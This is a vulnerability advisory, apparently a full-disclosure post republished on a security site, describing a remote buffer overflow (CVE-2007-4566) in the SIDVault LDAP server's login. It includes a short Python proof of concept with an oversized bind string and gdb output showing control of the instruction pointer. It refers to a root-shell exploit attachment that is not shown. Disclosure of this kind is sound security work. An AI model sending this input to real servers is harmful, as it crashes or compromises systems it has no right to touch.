SIDVault LDAP Server Remote Buffer Overflow

2007.08.28
Credit: Joxean Koret
Risk: High
Local: Yes
Remote: Yes
CVE: CVE-2007-4566
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

SIDVault LDAP Server Remote Buffer Overflow =========================================== Product Description: SIDVault LDAP Server for Win32 and GNU/Linux SIDVault is a Simple Integration Database, allowing easy management and installations with high performance LDAP v3 server. It supports any number of schemas, easy to add/modify existing schemas, integrated web based user access, and fast browser based administration tools. Supports all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. Vulnerable versions: Win32 2.0e Linux 2.0d Vulnerability Details: The login mechanism is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. Successfully exploiting the issue will allow an attacker to execute arbitrary code with root or SYSTEM-level privileges depending on the operative system target. Failed exploit attempts will result in a denial-of-service condition. Proof of concept: # gdb /usr/local/sidvault/sidvault (...) (gdb) r -run In another terminal: $ cat poc.py import ldap l = ldap.open("localhost") l.simple_bind("dc=" + "A"*4099, "B"*256) $ ./poc.py In the first terminal: Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1226736720 (LWP 5942)] 0x41414141 in ?? () (gdb) where #0 0x41414141 in ?? () #1 0x41414141 in ?? () (...) Quit (gdb) i r eax 0x8202c48 136326216 ecx 0x0 0 edx 0xb6e164df -1226742561 ebx 0x41414141 1094795585 esp 0xb6e16500 0xb6e16500 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 Exploit: An exploit for Debian based distributions which spawns a remote root terminal has been writen. See the attached exploit. Patch information: The problem is solved in the latest version (2.0f) which is available in the vendor's website at http://www.alphacentauri.co.nz/. Thanks: Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind and professional. Disclaimer: The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact: Joxean Koret - joxeankoret[at]yahoo[dot]es -------------- next part -------------- A non-text attachment was scrubbed... Name: exploit.py Type: text/x-python Size: 1723 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070826/b3f374a5/attachment.py -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 191 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070826/b3f374a5/attachment.bin


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top